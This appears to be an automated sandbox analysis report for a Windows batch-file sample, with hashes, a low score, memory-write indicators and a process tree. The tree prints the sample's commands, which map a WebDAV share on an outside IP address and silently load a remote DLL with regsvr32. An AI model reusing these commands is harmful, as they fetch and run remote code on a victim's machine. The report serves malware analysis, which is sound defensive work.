3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
10-07-2024 01:24

Target

3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864.bat
Size

5KB
MD5

a0eb3694b5dc757fa2a4c93bd47e89a4
SHA1

2e7df10f507e4a298789e88eca9712b8bcd9ffa3
SHA256

3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864
SHA512

6252e33c6d2aca4258fe3c001c08af13e19f65d74c385cf9ecf8497a5dbca81d286b0e57ab2242d2b7cbd5905d05ec9ca95c8a57125ebe02c719b464e9824785
SSDEEP

96:DMIVD1vVgagBUTvcsqIsWNyFjIfuDIfqsS:Q+DyBUbnkjbDx7

Score

1^/10

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2524	regsvr32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 1036	2532	cmd.exe	31
PID 2532 wrote to memory of 1036	2532	cmd.exe	31
PID 2532 wrote to memory of 1036	2532	cmd.exe	31
PID 2532 wrote to memory of 2524	2532	cmd.exe	32
PID 2532 wrote to memory of 2524	2532	cmd.exe	32
PID 2532 wrote to memory of 2524	2532	cmd.exe	32
PID 2532 wrote to memory of 2524	2532	cmd.exe	32
PID 2532 wrote to memory of 2524	2532	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\system32\net.exe
  net use \\45.9.74.13@8888\DavWWWRoot\
  2⤵
  PID:1036
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\648.dll
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2524